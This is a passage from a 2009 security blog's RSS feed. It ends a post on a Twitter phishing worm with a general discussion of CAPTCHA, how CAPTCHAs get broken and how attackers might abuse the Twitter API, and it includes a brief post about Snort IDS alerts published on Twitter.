<div id="attachment_506" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/rodney-lawrence-international.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/rodney-lawrence-international-300x228.jpg" alt="The phishing site." title="Rodney Lawrence International" width="300" height="228" class="size-medium wp-image-506" /></a><p class="wp-caption-text">The Rodney Lawrence International phishing site.</p></div>

<h4>Something New</h4>

<p>One of the differences with this attack that separates it from previous ones is that in the time since the more famous compromises of January of this year (Barack Obama, Britney Spears, CBS News, Kevin Rose) Twitter has implemented some controls around the login screen, including a CAPTCHA element that shows up after several bad password entries.</p>

<p>CAPTCHA is a program designed to differentiate humans from computers and prevent abuse by bots, the automated programs used to generate spam, among other things.  It is a contrived acronym standing for Completely Automated Public Turing test to tell Computers and Humans Apart. CAPTCHA has three primary principles: the computer can’t solve it, most humans can, and the test does not rely on some form of obscurity such as being a new implementation.</p>

<div id="attachment_498" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/capchascreen1.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/capchascreen1-300x179.gif" alt="reCAPTCHA, a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows." title="ReCaptcha" width="300" height="179" class="size-medium wp-image-498" /></a><p class="wp-caption-text">reCAPTCHA, a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows.</p></div>

<p>Actually, reCAPTCHA is used: a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows. When you translate the image to text, you are acting as a human optical character recognition (OCR) engine. The service was acquired by Google this month.
Circumventions of CAPTCHA have occurred at each step in the method’s evolution, starting with its first wide use in Yahoo’s EZ-Gimpy program, and they use roughly the same three-step process: pre-processing (removing the background obscurities), segmentation (separating the letters), and classification (identifying each letter).  Segmentation remains the one area where humans outperform computers; however, spammers are achieving some level of success here too.  Here is a good analysis from WebSense detailing how a service in Russia is achieving a <a href="http://securitylabs.websense.com/content/Blogs/2919.aspx">20% rate in automated breaks</a> of CAPTCHA images.</p>

<p>So CAPTCHA, while not perfect, does help mitigate dictionary and brute force password attacks by adding another layer of complexity to the authentication process.  Some of the reasons for beating CAPTCHA are to be able to post blog comment spam, create fraudulent accounts such as the e-mail example above, and similarly automate the completion of web forms designed for human interaction.  In these applications it makes sense: a download of the image, a translation to text, and the comment spam is posted, the e-mail account created, and so forth.  If two or three out of every ten requests are successful, the comment will be posted or the new account opened at an acceptable rate.</p>

<p>In a password cracking application, which moves quickly through a large number of password candidates for each ID, the additional processing combined with a less than perfect translation rate adds a level of complexity that an attacker is unlikely to bother with.  With that in mind, how does the bad actor break into Twitter accounts easily?
The answer may lie in the Twitter API, which, while it limits the rate of requests, still allows a much larger request rate to be granted upon request.  That is not to suggest that this is definitely what this attacker did; in fact the bad actor in this case may have previously held compromised IDs, may have used more conventional spam tactics to get an original seeding of IDs, or may have broken into a few early accounts as discussed here.  Only Twitter could potentially have the log access to figure this out.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/">Persistent XSS on Twitter.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Snort is Tweeting</title>
		<link>http://praetorianprefect.com/archives/2009/04/snort-is-tweeting/</link>
		<comments>http://praetorianprefect.com/archives/2009/04/snort-is-tweeting/#comments</comments>
		<pubDate>Thu, 30 Apr 2009 04:12:27 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=74</guid>
		<description><![CDATA[Network engineer Leon Ward of SourceFire has taken the unusual step of publishing his intrusion detection system (IDS) alerts over Twitter, the popular microblogging platform.  If you are so inclined, you can monitor his IDS along with your own, by following <a href="https://twitter.com/SnortIDS">@SnortIDS</a> on <a href="http://www.twitter.com">Twitter</a>.]]></description>
			<content:encoded><![CDATA[<p>Network engineer Leon Ward of SourceFire has taken the unusual step of publishing his intrusion detection system (IDS) alerts over Twitter, the popular microblogging platform.  If you are so inclined, you can monitor his IDS along with your own, by following <a href="https://twitter.com/SnortIDS">@SnortIDS</a> on <a href="http://www.twitter.com">Twitter</a>.</p>

<div id="attachment_87" class="wp-caption alignnone" style="width: 789px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/04/snort_twitter.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/04/snort_twitter.gif" alt="Snort is on Twitter" title="snort_twitter" width="779" height="485" class="size-full wp-image-87" /></a><p class="wp-caption-text">Snort is on Twitter</p></div>

<p>Thus far the account has the distinction of being mentioned (tweeted and retweeted) 10 times on Twitter, while still only being followed by 5 people :).  This is probably a reflection of the real life problem of getting people to review and respond to IDS alerts.</p>

<p>Many firms consider intrusion alerts confidential data, right alongside vulnerability and security test data.  IDS logs contain information about internal hosts, and if properly tuned (a big if) can be used to discern which signatures a firm is most interested in, potentially because they are aware of vulnerable systems downstream.  Ward has partially mitigated this concern by scrubbing out information on his internal hosts in the tweet stream.</p>

<p>Snort is the immensely popular open source network intrusion detection/prevention system originally written by Martin Roesch and maintained today by Sourcefire, the Columbia, Maryland security firm of which Roesch is CTO.  There have been some 3 million downloads of the Snort IDS since its inception.</p>

<p>Leon has stated that he will release his code in the next few weeks.</p>

<h4>References</h4>

<p><a href="http://leonward.wordpress.com/2009/04/27/tweetyard-sourcefire-and-snort-alerts-to-twitter/">TweetYard &#8211; Sourcefire and Snort alerts to Twitter</a></p>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/04/snort-is-tweeting/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
